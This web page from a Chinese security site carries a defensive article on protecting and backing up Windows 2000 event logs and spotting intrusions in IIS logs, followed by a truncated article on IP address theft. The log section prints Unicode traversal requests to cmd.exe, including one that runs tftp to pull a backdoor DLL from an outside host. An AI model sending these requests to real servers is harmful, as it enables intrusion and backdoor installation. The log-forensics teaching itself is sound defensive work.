频道栏目
首页 > 资讯 > win7激活工具 > 正文

Windows“黑匣子”的保护和分析

04-11-05        来源:[db:作者]  
收藏   我要投稿

Windows系统以它的易用性倍受网管员的青睐,国内相当部分的大型网站都是用Windows 2000/XP系统建立的。Windows系统使用的人多了,研究它安全的人也多了。在此我要提醒一下网管们,虽然你补上了所有的安全补丁,但是谁又知道新的漏洞何时又会被发现呢?所以也应该做好系统日志的保护工作。
作为黑客,他们也是最关心系统日志的,一旦他们入侵成功,要做的第一件事就是删除你的日志文件,使你在被入侵后无法追踪黑客行为,以及检查黑客所做的操作行为。日志文件就像飞机中的“黑匣子”一样重要,因为里面保存着黑客入侵行为的所有罪证。

日志的移位与保护

Windows 2000的系统日志文件包括:应用程序日志、安全日志、系统日志、DNS服务日志,以及FTP连接日志和HTTPD日志等。在默认情况下日志文件大小为512KB,日志保存的默认的位置如下:
安全日志文件:%systemroot%system32config SecEvent.EVT
系统日志文件:%systemroot%system32config SysEvent.EVT
应用程序日志文件:%systemroot%system32config AppEvent.EVT
FTP连接日志和HTTPD事务日志:%systemroot% system32LogFiles,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
在此笔者把系统默认为.EVT扩展名的日志文件统称为事件日志,笔者看了好多文章介绍对事件日志移位能做到很好的保护。移位虽是一种保护方法,但只要在命令行输入dir c:*.evt/s(如系统安装在D盘,则盘符为D),一下就可查找到事件日志位置。日志移位要通过修改注册表来完成,我们找到注册表HKEY_LOCAL_MACHINESYSTEM CurrentControlSet ServicesEventlog位置,下面的Application、Security、System几个子键,分别对应“应用程序日志”、“安全日志”、“系统日志”。如何修改注册表,下面我们来看看Application子键,如图1所示。

图1



File项就是“应用程序日志”文件存放的位置,把此键值改为我们要存放日志文件的文件夹,然后再把%systemroot%system32configappevent.evt文件拷贝到此文件夹,再重启机器。在此介绍移位的目的是为了充分利用Windows 2000在NTFS格式下的“安全”属性,如果不移位也无法对文件进行安全设置操作,右击移位后的文件夹选择“属性”,进入“安全”选项卡,不选择“允许将来自父系的可继承权限传播给该对象”,添加“System”组,分别给Everyone组“读取”权限,System组选择除“完全控制”和“修改”的权限。然后再将系统默认的日志文件512KB大小改为你所想要的大小,如20MB。
进行了上面的设置后,再直接通过Del C:*.Evt/s/q来删除是删不掉的;对系统正在使用的记录文件在命令行形式中用上面的命令也是拒绝操作的。

日志文件的备份

基于WMI技术的日志备份脚本
WMI(Windows Management Instrumentation)技术是微软提供的Windows下的系统管理工具,基于WMI开发的脚本均可在Windows 2000/NT上成功运行。微软提供了一个脚本,利用WMI将日志文件大小设为25MB,并允许日志自动覆盖14天前的日志。(编者按:限于篇幅,脚本就不刊登了,需要的读者朋友请自行到微软网站上查找,或向责编索要。)
我们只需把该脚本保存为.vbs扩展名的文件就可以使用,我们还可以修改上面的脚本来备份日志文件,笔者在此建议,在备份日志时一定将EVT的后缀名改为其他后缀保存(如.C),目的是让攻击者不易找到。

通过dumpel工具的备份
可用微软Resource Kit工具箱中的dumpel.exe工具备份日志文件,其格式为:
dumpel -f file [-s \server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t] [-dx]
-s \server  输出远程计算机日志,如果是本地,这个可以省略。
-f filename  输出日志的位置和文件名。
-l log log 可选为System,Security,Application,可能还有别的如DNS等。
如要把目标服务器Server上的系统日志转存为Systemlog.log可以用如下格式:
dumpel \ server -l system -f Systemlog.log
如果利用计划任务还可以实现定期备份系统日志。

HTTPD事务日志的分析

Microsoft的IIS 5自公布到现在,被黑客利用的漏洞是很多的,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我们备份日志的目的就是为了分析黑客入侵的行为,对于没有打好补丁包的系统被黑客成功入侵的日志记录分别对应如下。

unicode漏洞入侵日志记录
我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%system32LogFiles文件夹下,如图2所示是一个典型的Unicode漏洞入侵行为的日志记录,对于正常的Web访问,是通过80端口用GET命令获取Web数据,但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此洞。

图2


如通过下面的编码查看目标机的目录文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
则日志中会记录下此访问行为:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
然而我们的日志中记录的一清二楚,是来自192.168.0.1的攻击者查看我们的目录。而下面一行是向我们的机器传送后门程序的记录:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll 502 -

WebDavx3远程溢出日志记录
最近在黑客界有名的Wevdavx3漏洞是应用最广泛的,连打了最新SP3补丁的系统也不放过。如果系统遭受了此远程溢出的攻击行为,则日志记录如图3所示。

我们看到图中这样的一行信息:
2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……
就表示我们的Web服务受到了来自192.168.0.218的攻击,并锁定(即关闭)了WEB服务。后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。
上面都记录了入侵行为的IP地址,此IP地址并不能排除是攻击者使用了跳板,也就是说此IP很可能是“肉鸡”而不是攻击者的IP,但再查看其他日志文件,还是有可能追查出攻击者的位置。
不过笔者写到最后,还是想说一句,最好还是安装一个防火墙来记录和阻止黑客行为。
看好您的IP地址
——通过管理交换机端口来阻止IP地址盗用
■ 北京 高秀霞
目前IP地址盗用行为非常常见,许多“不法之徒”用盗用地址的行为来逃避追踪、隐藏自己的身份。IP地址的盗用行为侵害了网络正常用户的权益,并且给网络安全、网络的正常运行带来了巨大的负面影响,因此研究IP地址盗用的问题,找出有效的防范措施,是当前的一个紧迫课题。

IP地址盗用常用的方法及其防范机制

IP地址盗用是指盗用者使用未经授权的IP地址来配置网上的计算机。IP地址的盗用通常有以下两种方法:
一是单纯修改IP地址的盗用方法。如果用户在配置或修改配置时,使用的不是合法获得的IP地址,就形成了IP地址盗用。由于IP地址是一个协议逻辑地址,是一个需要用户设置并随时修改的值,因此无法限制用户修改本机的IP地址。
二是同时修改IP-MAC地址的方法。针对单纯修改IP地址的问题,很多单位都采用IP-MAC捆绑技术加以解决。但IP-MAC捆绑技术无法防止用户对IP-MAC的修改。MAC地址是网络设备的硬件地址,对于以太网来说,即俗称的网卡地址。每个网卡上的MAC地址在所有以太网设备中必须是惟一的,它由IEEE分配,固化在网卡上一般不得随意改动。但是,一些兼容网卡的MAC地址却可以通过配置程序来修改。如果将一台计算机的IP和MAC地址都修改为另一台合法主机对应的IP和MAC地址,那么IP-MAC捆绑技术就无能为力了。另外,对于一些MAC地址不能直接修改的网卡,用户还可以通过软件修改MAC地址,即通过修改底层网络软件达到欺骗上层软件的目的。
目前发现IP地址盗用比较常用的方法是定期扫描网络各路由器的ARP(address resolution protocol)表,获得当前正在使用的IP地址以及IP-MAC对照关系,与合法的IP地址表,IP-MAC表对照,如果不一致则有非法访问行为发生。另外,从用户的故障报告(盗用正在使用的IP地址会出现MAC地址冲突的提示)也可以发现IP地址的盗用行为。在此基础上,常用的防范机制有:IP-MAC捆绑技术、代理服务器技术、IP-MAC-USER认证授权以及透明网关技术等。
这些机制都有一定的局限性,比如IP-MAC捆绑技术用户管理十分困难;透明网关技术需要专门的机器进行数据转发,该机器容易成为瓶颈。更重要的是,这些机制都没有完全从根本上防止IP地址盗用行为所产生的危害,只是防止地址盗用者直接访问外部网络资源。事实上,由于IP地址盗用者仍然具有IP子网内完全活动的自由,因此一方面这种行为会干扰合法用户的使用:另一方面可能被不良企图者用来攻击子网内的其他机器和网络设备。如果子网内有代理服务器,盗用者还可以通过种种手段获得网外资源。

利用端口定位及阻断IP地址盗用

交换机是局域网的主要网络设备,它工作在数据链路层上,基于MAC地址来转发和过滤数据包。因此,每个交换机均维护着一个与端口对应的MAC地址表。任何与交换机直接相连或处于同一广播域的主机的MAC地址均会被保存到交换机的MAC地址表中。通过SNMP(Simple Network Management protocol)管理站与各个交换机的SNMP代理通信可以获取每个交换机保存的与端口对应的MAC地址表,从而形成一个实时的Switch-Port-MAC对应表。将实时获得的

相关TAG标签
上一篇:利用adodb.stream直接下载任何后缀的文件
下一篇:ASP在SQL Server 2k中新建帐号和权限
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站